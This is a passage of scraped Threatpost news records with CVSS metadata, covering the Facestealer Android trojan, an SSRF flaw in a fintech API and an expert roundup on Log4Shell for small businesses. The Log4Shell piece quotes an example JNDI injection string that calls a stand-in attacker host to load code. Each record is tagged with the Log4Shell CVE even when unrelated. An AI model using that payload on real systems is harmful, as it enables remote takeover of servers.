NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-16T13:39:33", "type": "threatpost", "title": "Emotet Now Spreading Through Malicious Excel Files", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-16T13:39:33", "id": "THREATPOST:66848A3C9B8917C8F84DFDC04DD5F6D9", "href": "https://threatpost.com/emotet-spreading-malicious-excel-files/178444/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-21T19:24:31", "description": "A popular mobile app in the official Google Play store called \u201cCraftsart Cartoon Photo Tools\u201d has racked up more than 100,000 installs \u2013 but unfortunately for the app\u2019s enthusiasts, it contains a version of the Facestealer Android malware.\n\nThat\u2019s according to researchers at Pradeo, who said the app performs somewhat as promised, pretending to be a legitimate photo editing tool. Specifically, it claims to allow users to convert photos into cartoon or \u201cpainting\u201d-style versions using a few different filters. However, behind this mask lies a \u201csmall piece of [malicious] code that easily slips under the radar of store\u2019s safeguards,\u201d they explained.\n\nFacestealer is a [known Android threat](<https://threatpost.com/gaming-banking-trojans-mobile-malware/178571/>) that has made its way into Google Play in the past via trojanized apps. According to past Malwarebytes [analysis](<https://blog.malwarebytes.com/detections/android-trojan-spy-facestealer/>), when the application is first launched, it guides the user to the legitimate main Facebook login page and asks users to log in before they can use the app. Then, \u201cinjected malicious JavaScript steals the login credentials and sends them to a command-and-control server,\u201d according to the firm. \u201cThe C2 server makes use of login credentials to authorize access to the [account].\u201d\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/21151430/google-play-malware-300x250.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/21151430/google-play-malware.png>)\n\nSplash page for the Craftsart Cartoon Photo Tools app, from Google Play.\n\nFrom there, the trojan is off to the data-stealing races: It lifts information from victims\u2019 Facebook accounts, including email addresses and IP addresses, phone numbers, conversations and messaging histories, credit-card details, friend lists and more.\n\n\u201cWhen your login credentials for a social-media account have been stolen this can have serious consequences,\u201d explained Pradeo researchers, in a [Monday writeup](<https://blog.pradeo.com/spyware-facestealer-google-play>). \u201cIt gives threat actors a base from which to gather more information.\u201d They added, \u201cFacebook credentials are used by cybercriminals to compromise accounts in multiple ways, the most common being to commit financial fraud, send phishing links and spread fake news.\u201d\n\nA Pradeo analysis of Craftsart Cartoon Photo Tools found that the app makes connections to a Russian-registered domain that has been used for at least seven years as the command-and-control (C2) address for various malicious Android apps.\n\n\u201c[The domain] is connected to multiple malicious mobile applications that were at some points available on Google Play and later deleted,\u201d they explained. \u201cTo maintain a presence on Google Play, repackaging mobile apps is common practice for cybercriminals. Sometimes, we even observed cases in which repackaging was entirely automated.\u201d\n\nPradeo researchers said they alerted the Google Play team about the app, but as of Monday, it was [still available](<https://play.google.com/store/apps/details?id=com.craftstoon.cartoonphoto>) in the official store. Obviously, users should delete the app immediately from their phones.\n\n## **Avoiding Google Play Malware **\n\nKaspersky, in a [February posting](<https://securelist.com/mobile-malware-evolution-2021/105876/>), noted that malware was [increasingly popping up](<https://threatpost.com/updated-joker-malware-android-apps/167776/>) in Google Play, using the same tactic that Craftsart Cartoon Photo Tools uses.\n\n\u201cThe most common way to sneak malware onto Google Play is for a trojan to mimic a legitimate app already published on the site (for example, a photo editor or a VPN service) with the addition of a small piece of code to decrypt and launch a payload from the trojan\u2019s body or download it from the attackers\u2019 server,\u201d researchers explained. \u201cOften, to complicate dynamic analysis, unpacking actions are performed through commands from the attackers\u2019 server and in several steps: each decrypted module contains the address of the next one, plus instructions for decrypting it.\u201d\n\nUser should thus always be wary of any app with warning signs. In this current case, even though the app has managed to attract a large number of installs, there are definite red flags in the reviews.\n\nSome users flagged the forced Facebook login, commenting that it must be \u201csome kind of phishing.\u201d Others comments included, \u201cfake fake fake\u201d and \u201cvery very very bad app,\u201d which sum up the overall reactions of reviewers. Also, some noted that the functionality the app claims to have is limited or nonexistent \u2013 always a sign to stay away.\n\nIn all, Craftsart Cartoon Photo Tools has a 2.1-star rating, with the majority of the reviews being one-star assessments, balanced out by a handful of obviously fake five-star reviews. There are no two-, three- or four-star ratings, which is clearly telling.\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n\n_ _\n\n**_ _**\n\n**_ _**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-21T19:18:32", "type": "threatpost", "title": "Facestealer Trojan Hidden in Google Play Plunders Facebook Accounts", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-21T19:18:32", "id": "THREATPOST:08E51C6FB9418179611DF2ACFB1073BF", "href": "https://threatpost.com/facestealer-trojan-google-play-facebook/179015/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-07T13:47:15", "description": "A [server-side request forgery (SSRF) flaw](<https://threatpost.com/microsoft-azure-flaws-servers-takeover/159965/>) in an API of a large financial technology (fintech) platform potentially could have compromised millions of bank customers, allowing attackers to defraud clients by controlling their bank accounts and funds, researchers have found.\n\nA team at [Salt Security\u2019s](<https://salt.security/>) [Salt Labs](<https://salt.security/blog-authors/salt-labs>) identified the vulnerability in an API in a web page that supports the organization\u2019s platform fund transfer functionality, which allows clients to transfer money from their accounts on its platform into their bank accounts, researchers disclosed in [a report published Thursday](<https://salt.security/blog/api-threat-research-server-side-request-forgery-on-fintech-platform-enabled-administrative-account-takeover>).\n\nThe company in question\u2014dubbed \u201cAcme Fintech\u201d to preserve its anonymity\u2013offers a \u201cdigital transformation\u201d service for banks of all sizes, allowing the institutions to switch traditional banking services to online services. The platform already has been actively integrated into many banks\u2019 systems and thus has millions of active daily users, researchers said.\n\nIf the flaw had been exploited, attackers could have performed various nefarious activities by gaining administrative access to the banking system using the platform. From there they could have leaked users\u2019 personal data, accessed banking details and financial transactions, and performed unauthorized fund transfers into their own bank accounts, researchers said.\n\nUpon identifying the vulnerability, researchers reviewed their findings and provided recommended mitigation to the organization, they said.\n\n## **High Reward for Threat Actors**\n\nAPI flaws are often overlooked, but researchers at Salt Labs said in the report that they \u201csee vulnerabilities like this one and other API-related issues on a daily basis.\u201d\n\nIndeed, 5 percent of organizations experienced an API security incident in the past 12 months, according to the company\u2019s [State of API Security](<https://salt.security/api-security-trends?>) report for the first quarter of 2022. This period also showed significant growth of malicious API traffic, they said.\n\n\u201c[Critical SSRF flaws](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) are more common than many FinTech providers and banking institutions realize,\u201d Yaniv Balmas, vice president of research for Salt Security said in a press statement. \u201cAPI attacks are becoming more frequent and complex.\u201d\n\nFintech companies are especially vulnerable to compromise because their customers and partners rely on a vast network of APIs to drive interactions between various websites, mobile applications and custom integrations, among other systems, researchers said.\n\nThis, in turn, makes them \u201cprime targets by attackers looking to abuse API vulnerabilities\u201d for a couple of reasons, researchers wrote.\n\n\u201cOne, their API landscape and overall functionality is very rich and complex, which leaves a lot of room for mistakes or overlooking details in development,\u201d they wrote. \u201cTwo, if a bad actor can successfully abuse this type of platform, the potential profits are huge, since it could allow control of millions of users\u2019 bank accounts and funds.\u201d\n\n## **The Vulnerability**\n\nResearchers discovered the flaw while scanning and recording all traffic sent and received across the organization\u2019s website. On a page that connects clients to various banks so they can transfer funds to their bank accounts, researchers discovered an issue with the API the browser calls to handle the request.\n\n\u201cThis specific API is using the endpoint located at \u2018/workflows/tasks/{TASK_GUID}/values,\u2019 the HTTP method used to call it is \nPUT, and the specific request data is sent in the HTTP body section,\u201d researchers explained.\n\nThe request body also carries a JWT Bearer token, which is a cryptographically signed key that lets the server know who is the requesting user and what permissions he has.\n\nThe flaw was in the request parameters that send the required data for a funds transfer\u2014specifically a parameter called \u201cInstitutionURL,\u201d researchers explained. This is a user-provided value that includes a URL pointing to some GUID value placed on the receiving bank website.\n\nIn this case, the bank\u2019s web server handled the user-supplied URL by trying to contact the URL itself, allowing for a SSRF in which the web server still tried to call an arbitrary URL if it was inserted into the code instead of the appropriate bank\u2019s URL, researchers explained.\n\n## **Exposing the SSRF Flaw**\n\nResearchers demonstrated this flaw by forging a malformed request containing their own domain. The connection coming into their server was made successfully, proving that \u201cthe server blindly trusts domains provided to it in this parameter and issues a request to that URL,\u201d they wrote.\n\nFurther, the request that came into their server included a JWT token used for authentication, which turned out to be a different one than the token included in the original request.\n\nResearchers embedded the new JWT token into a request they\u2019d previously encountered to an endpoint named \u201c/accounts/account,\u201d which had allowed them to retrieve information from a bank account. This time they returned even more information, they said.\n\n\u201cThe API endpoint recognized our new JWT administrative token and very gracefully returned a list of every user and its details across the platform,\u201d researchers revealed.\n\nTrying the request again to an endpoint named \u201c/transactions/transactions\u201d with the new token also allowed them to access a list of all transactions made by every user on the banking system, they said.\n\n\u201cThis vulnerability is a critical flaw, one that completely compromises every bank user,\u201d researchers said. \u201cHad bad actors discovered this vulnerability, they could have caused serious damage for both [the organization] and its users.\u201d\n\nSalt Labs hopes that shining a light on API threats will inspire security practitioners to take a closer look at how their systems may be vulnerable in this way, Balmas said.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-07T13:46:17", "type": "threatpost", "title": "SSRF Flaw in Fintech Platform Allowed for Compromise of Bank Accounts", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-07T13:46:17", "id": "THREATPOST:B7C8B7F3016D73355C4ED5E05B0E8490", "href": "https://threatpost.com/ssrf-flaw-fintech-bank-accounts/179247/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T20:32:17", "description": "News of the Log4Shell vulnerability is everywhere, with security experts variously calling the Apache log4j logging library bug a recipe for an \u201cinternet meltdown,\u201d as well as the \u201cworst cybersecurity bug of the year.\u201d Names like \u201cApple,\u201d \u201cTwitter\u201d and \u201cCloudflare\u201d are being bandied about as being vulnerable, but what does the issue mean for small- and medium-sized businesses?\n\nWe asked security experts to weigh in on the specific effects (and advice/remedies) for SMBs in a set of roundtable questions, aimed at demystifying the firehose of information around the headline-grabbing issue.\n\nIt may seem overwhelming for smaller companies. But our experts, from Anchore, Cybereason, Datto, ESET, HackerOne, Invicti Security, Lacework and Mitiga, have weighed in here with exclusive, practical advice and explanations specifically for SMBs dealing with Log4Shell.\n\n_\u201cWiz research shows that more than 89 percent of all environments have vulnerable log4j libraries. And in many of them, the dev teams are sure they have zero exposure \u2014 and are surprised to find out that some third-party component is actually built using Java.\u201d \u2014 Ami Luttwak, __co-founder and CTO at Wiz, which has seen its usage double as a result of Log4Shell (via email to Threatpo__st)._\n\n_**Questions answered (click to jump to the appropriate section):**_\n\n * What bad Log4Shell outcomes are possible for SMBs?\n * How is a real-world Log4Shell attack carried out?\n * How can SMBs prepare for Log4Shell without a dedicated security team?\n * What happens if an SMB uses an MSP?\n * What applications should SMBs worry about being attacked?\n * How can SMBs remediate a Log4Shell attack?\n * Final thoughts\n\n## Background on Log4Shell\n\nLog4Shell ([CVE-2021-44228](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>)) affects applications that rely on the log4j library to log data. Because that library is almost ubiquitous in Java applications, virtually any business that has a website is highly likely to be affected. With one line of malicious code, attackers are able to execute malware or commands on a target application and take over the server that houses it.\n\nFrom there, an attacker can carry out any number of further attacks.\n\n\u201cSmall businesses are at significant risk because plenty of the software they rely on may be vulnerable, and they do not have the resources to patch quickly enough,\u201d Ofer Maor, Mitiga CTO, told Threatpost.\n\nSMBs also tend to rely on third-party software suppliers and managed service providers (MSPs) for their technology infrastructure, which reduces cost and reduces the need for dedicated IT staff. However, this unfortunately puts SMBs at even worse risk, because they need to rely on their third-party vendors to patch and respond in many cases.\n\nThe bug was first disclosed as a zero-day vulnerability last week, but an emergency fix has been rolled out that now must be incorporated by the many developers who use log4j in their applications. The steps to address Log4Shell for SMBs thus include identifying potentially affected applications (including those provided by MSPs), confirming the vulnerability\u2019s impact within them, and applying or confirming updates as soon as possible. SMBs will also need to determine whether they\u2019re already compromised and remediate the issue if so.\n\nAll of this should take priority since [a slew of attacks is imminent](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>), thanks to an exploit becoming publicly available online, researchers noted.\n\n\u201cNumerous attack groups are already [actively exploiting](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) this vulnerability, mostly through automated scripts,\u201d Maor warned. \u201cThis means we expect to see this being exploited in masses, hitting tens of thousands or even more targets.\u201d\n\n## What Bad Log4Shell Outcomes Are Possible for SMBs?\n\n**Ofer Maor, Mitiga CTO:** One of the concerns is that a lot of these attacks now will focus on getting initial access only and establishing persistence (that is, installing something that will allow the attacker to have access to their systems later, even after the vulnerability has been fixed).\n\n**Marc-\u00c9tienne L\u00e9veill\u00e9, malware researcher for ESET:** SMBs providing online services may expose their system to malware and data exfiltration if their systems use the log4j software to log events. The risk is quite high, given the exploit is available online and relatively easy to trigger. Once into the network, cybercriminals could pivot to gain access to additional resources.\n\n**Josh Bressers, vice president of security at Anchore:** This vulnerability allows attackers to run the code of their choosing, such as a cryptominer, a backdoor or data-stealing malware, for example. One of the challenges for a vulnerability like this is the attacker landscape is changing rapidly. So far, most of the attacks seem to be using compute resources to mine cryptocurrency, but these attacks are changing and evolving each hour. It is expected that the attacks will gain in sophistication over the coming days and weeks.\n\n**Mark Nunnikhoven, distinguished cloud strategist at Lacework:** Unfortunately\u2026an attacker can take over your system or steal your data quite easily using this vulnerability.\n\n**Pieter Ockers, senior director of technical services at HackerOne: **In a more devastating case, criminals that gain initial access to the victim\u2019s environment could auction that access off to crews that specialize in executing ransomware attacks. SMBs should be hyper-aware of any of their software vendors/MSPs that use Apache log4j in case they are affected by a breach; I suspect we might hear of some ransomware attacks soon stemming from this vulnerability.\n\n## How Is a Real-World Log4Shell Attack Carried Out?\n\n**Cybereason CTO Yonatan Striem-Amit**: The most prevalent attack scenarios we\u2019ve seen are abusing things like the user agent or things like a log-in screen. If an application has a log-in page where a user is asked to put his username and password (and a lot of them do), an attacker could just supply the malicious string within that user field and get code execution on that server. After that he essentially controls logins, and therefore can start doing whatever he wants on that server, including, of course, eavesdropping into every other user who\u2019s logging in to the environment with their password.\n\n**Adam Goodman, vice president of product management at Invicti Security: **This attack is astonishingly easy to execute. This is because it may not require authentication to execute, nor would it require penetrating multiple application and/or networking layers to begin the exploit. It\u2019s simply a text string sent to any places that will be logged. And finding such a place is very easy \u2013 it can be a simple header, or a simple text field or error condition sent to a log file.\n\nTo exploit Log4Shell, the attacker may use any user input subsequently logged by the log4j framework. For example, in the case of a web application, it may be any text entry field or HTTP header such as User-Agent. Server logging is often set to log headers as well as form data.\n\nThe attacker only needs to include the following string in the logged user input:\n\n${jndi:ldap://attacker.com/executeme}\n\nWhere attacker.com is a server controlled by the attacker and executeme is the Java class to be executed on the victim server. And this is just one of many ways to exploit this vulnerability.\n\n**Lacework\u2019s Nunnikhoven: **\u201cA real world-attack can be as simple as the attack sending a specifically crafted web request to a vulnerable server. When the server processes that request, the attacker then has access to the server. The Lacework Labs team has documented this attack and some other technical aspects of attacks we\u2019ve seen in[ this blog post](<https://www.lacework.com/blog/lacework-labs-identifies-log4j-attackers/>).\u201d\n\n**Anchore\u2019s Bressers: **Attackers send requests to vulnerable applications, this triggers the vulnerability. The application then downloads a cryptocurrency mining application, in one scenario, and runs it on the compromised system. The cryptomining application then consumes large amounts of victim\u2019s processing power while the attacker claims the cryptomining rewards.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/14151922/log4j-e1639513188979.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/14151922/log4j-e1639513188979.png>)\n\nTrend Micro published this attack-scenario flow on Tuesday (https://www.zerodayinitiative.com/blog/2021/12/14/the-december-2021-security-update-review).\n\n## How Can SMBs Address Log4Shell without a Dedicated Security Team?\n\n**HackerOne\u2019s Ockers: **These kinds of wide sweeping cyberattacks will always be a bigger challenge for those that lack a dedicated security team. If only one or two individuals in IT are working to monitor security, it\u2019s even more important you\u2019re prepared and have already taken stock of the software you\u2019re using and your vendor\u2019s software. Once you gain that visibility, I recommend patching any instances you find of log4j and updating the software to version 2.15.0 in your own software. I\u2019d also confirm any vendors\u2019 exposure and incident management around log4j patching and response.\n\n_According to __[Microsoft\u2019s recent blog](<https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/>)__, the log4j 2 library is included in widely deployed Apache products including Struts 2, Solr, Druid, Flink and Swift. SMBs that have built applications with these products should conduct a code audit to determine if the vulnerable version of log4j is in use._\n\n**Mitiga\u2019s Maor:** SMBs should set up an immediate task force to map all affected homegrown systems and patch them, while allowing IT to map all external systems and communicate with the censored systems.\n\n**Anchore\u2019s Bressers: **This vulnerability is going to be especially challenging for small and medium business users without a dedicated security team. Ideally software vendors are being proactive in their investigations and updates and are contacting affected customers, but this is not always the case.\n\nDepending on the level of technical acumen an organization has, there are steps that can be taken to detect and resolve the issue themselves. There are various open-source tools that exist to help detect this vulnerability on systems such as [Syft and Grype](<https://www.infoworld.com/article/3644492/how-to-detect-the-log4j-vulnerability-in-your-applications.html>). CISA has [released guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) regarding this vulnerability, including steps a business can take.\n\n**Lacework\u2019s Nunnikhoven: **\u201cWhile IT knowledge is required, the basic steps don\u2019t require a security team. IT teams should be trying to find systems that use log4j in their environment and then apply one of the techniques the fantastic team of volunteers with the log4j project have published or the recommended guidance from that system\u2019s vendors. This is a lot of work but it\u2019s necessary to reduce the risk to your business.\n\n_The log4j team\u2019s resource is __[available here](<https://logging.apache.org/log4j/2.x/security.html>), in the mitigation section under the \u201cFixed in Log4j 2.15.0\u201d heading._ _Many organizations have also published free tools to help identify vulnerable applications, [like this one](<https://about.sourcegraph.com/blog/log4j-log4shell-0-day/>), [this one](<https://log4j-tester.trendmicro.com/>) or [this one](<https://github.com/hillu/local-log4j-vuln-scanner>)._\n\n**Invicti\u2019s Adam Goodman: **It\u2019s a nightmare of a problem if you have a surplus of Java applications deployed everywhere, not just on the primary website. Organizations should immediately determine where and how they directly or indirectly use this library and then take steps to mitigate the vulnerability by either upgrading the library or modifying Java system properties to disable the vulnerable functionality.\n\nAim to ensure that all applications have limited outbound internet connectivity, and use Ansible scripts or adequate security tools to scan _en masse_ for the vulnerability before forcibly patching it. It\u2019s crucial to use security tools that target all of the applications they can find so that organizations have a more accurate window into their security posture.\n\nOrganizations that lack sufficient budget to invest in discovery tools should make a list of Java applications which they add to continually, and check them off, while prioritizing apps that present the most risk if exploited.\n\n## What Happens if an SMB Uses an MSP?\n\n**Anchore\u2019s Bressers: **I would expect an MSP to take the lead on this issue for their customers. An MSP should be monitoring their infrastructure for indicators of compromise, applying workarounds when possible, and updating the managed applications as vendor updates become available. Any business using MSP services should reach out to their provider and request a status update on the Log4Shell.\n\n**Ryan Weeks, CISO at Datto:** \u201cCyber-threats are always prevalent. Especially for small to medium-sized businesses (SMBs) \u2013 [78 percent](<https://www.datto.com/resources/dattos-2020-global-state-of-the-channel-ransomware-report>) of MSPs reported attacks against their client SMBs in the last two years alone. MSPs have a responsibility to diligently check for vulnerabilities and arm their customers with the tools to combat them. It\u2019s not enough to simply install routine software updates. SMBs need to ensure their partners proactively push out security updates for any affected products, and continually monitor for potential exploits.\n\n**Invicti\u2019s Adam Goodman: **This is an issue front-and-center in the security community and if an organization is using an MSP, it\u2019s highly likely that MSP is actively working on this. Confirm that a ticket and incident is open for this vulnerability, and ask the MSP for a list of managed applications that are under remediation. It\u2019s vital to review that list of apps for anything that\u2019s missing, including any back-office or forgotten tools in the mix. Ensure the MSP has visibility into the attack surface so that you both can better handle necessary containment steps moving forward.\n\n**Lacework\u2019s Nunnikhoven: **A managed service provider can help update and fix the systems they manage. A managed security service provider can help detect and stop attacks aimed at this issue, and help investigate any attacks that may have already taken place. The first step in both cases is speaking with your MSP/MSSP to understand the steps they are taking to help protect their customers.\n\n## What Applications Should SMBs Worry About?\n\n**Mitiga\u2019s Maor:** Impact can vary significantly as many custom-developed and off-the-shelf products are impacted. Many adversaries are using the vulnerability as part of mass-scanning efforts to identify vulnerable systems. Likewise, some known malware strains have already incorporated exploitation of this vulnerability into their spreading mechanisms. Any Java application might be affected.\n\n**Invicti\u2019s Adam Goodman: **SMBs should address worries and concerns based on business risk. Internet-facing apps should receive immediate priority, followed by applications that are critical to the software supply chain or back-office and financial applications. There is also an excellent effort from the security community to compile all affected technologies, [it can be found here](<https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592>).\u201d\n\n**ESET\u2019s L\u00e9veill\u00e9: **As a first step, SMBs should ask questions of the organization providing their internet-facing services such as their website. Then they should see if any of their applications use log4j to generate logs. Java applications and webservices would be the first to look at because log4j is a Java library.\n\n**Cybereason\u2019s Striem-Amit:** The world of Java and open source has so many dependencies, where a company might use one product, but it actually carries with it a dozen other libraries. So log4j could be present even though a company might not necessarily even be aware or \u2026 done it directly. So the scanning and the analysis is severely complex. And you have to go in each one of your servers and see, are we using log4j either directly or indirectly in that environment.\n\n## How Can SMBs Remediate a Successful Log4Shell Attack?\n\n**Mitiga\u2019s Maor:** Thankfully, there\u2019s a lot that can be done to harden environments. For customers with internally developed applications, limiting outbound internet connections from servers to only whitelisted hosts is a great step, if challenging to implement. Likewise, a variety of cybersecurity companies have listed steps that can be taken to harden vulnerable versions of log4j if upgrades can\u2019t be performed readily. Similarly, exploitation of this vulnerability and many others can be caught using typical compromise assessment techniques. It pays to threat hunt! Remediation is no different than recovering from any other type of RCE vulnerability.\n\n**Lacework\u2019s Nunnikhoven: **\u201cRemediation of this issue will depend on where you find log4j. If it\u2019s in something you\u2019ve written, you can update the library or turn off the vulnerable feature. For commercial software and services, you\u2019re reliant on the vendor to resolve the issue. While that work is ongoing, monitoring your network to attack attempts is reasonably straightforward\u2026if you have the security controls in place.\n\nLacework Labs has published[ a detailed technical post](<https://www.lacework.com/blog/lacework-labs-identifies-log4j-attackers/>) on some of the attack techniques currently in use. Expect more variants as cybercriminals develop more techniques to avoid various security controls and other mitigation.\n\nIn situations like this it\u2019s important to understand that until the root cause has been resolved (log4j updated or the feature in question turned off), attackers will continue to work to evade any mitigations that defenders put in place to stop them.\n\n**Anchore\u2019s Bressers: **An organization without an incident-management team on staff should reach out to an incident-management consulting group. There are a number of important steps that should happen when investigating any cybersecurity attack, successful or not, that can require preserving evidence, recovering data, and protecting employees and users. This is a serious vulnerability with serious consequences. It\u2019s one of the worst we have seen in recent history because of its ease of exploitability, far-reaching impacts and powerful nature.\n\n## Final Thoughts\n\n**Datto\u2019s Weeks:** Scenarios such as the log4j vulnerability underscore the importance of proactivity in security. While many are now scrambling to address the vulnerability with patches, it\u2019s equally more important to plan for subsequent attacks. Fortunately, there are solutions that can apply known workarounds for vulnerable instances.\n\n**HackerOne\u2019s Ockers: **As a best practice, I recommend all businesses have a clear understanding of the software used within their own systems. Even more important for SMBs in this instance \u2014 businesses should also have a clear understanding of the licensing agreements and security policies of any software vendors or service providers. This level of visibility lets security and IT teams quickly understand where they\u2019re at risk if, and when, something like this is exploited.\n\n**ESET\u2019s L\u00e9veill\u00e9: **SMBs should verify if there were any successful attempts to exploit the vulnerability by looking at their logs.\n\n**HackerOne\u2019s Ockers: **SMBs and larger organizations alike will be affected. As we\u2019re seeing, exploitation will continue to be widespread \u2013 this means it\u2019s particularly important that SMBs check if vendors are still using the vulnerable version of log4j to process user-controlled or otherwise untrusted data. And, if so, SMBs should also ask vendors if their data is stored or processed in the same exposed environment.\n\n**Cybereason\u2019s Striem-Amit:** I think at the end of the day, really prioritize the most internet-facing environments, and rely on your service providers as much as they can to assist you with other patching. You\u2019re welcome to use [our vaccine](<https://threatpost.com/patching-time-log4j-exploits-vaccine/177017/>) to buy time. It does work remarkably well to make sure that, between now and when you actually end up patching the server, you\u2019re kind of secure.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats. _****_[REGISTER TODAY](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_****_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This [Threatpost Town Hall](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>), sponsored by Rapid 7, features security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-14T17:54:47", "type": "threatpost", "title": "What the Log4Shell Bug Means for SMBs: Experts Weigh In", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T17:54:47", "id": "THREATPOST:76A5549135F9D578FFC2C8FACC135193", "href": "https://threatpost.com/log4shell-bug-smbs-experts/177021/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-31T18:15:01", "description": "Ghostwriter \u2013 a threat actor previously [linked](<https://www.mandiant.com/resources/unc1151-linked-to-belarus-government>) with the Belarusian Ministry of Defense \u2013 has glommed onto the [recently disclosed](<https://threatpost.com/browser-in-the-browser-attack-makes-phishing-nearly-invisible/179014/>), nearly 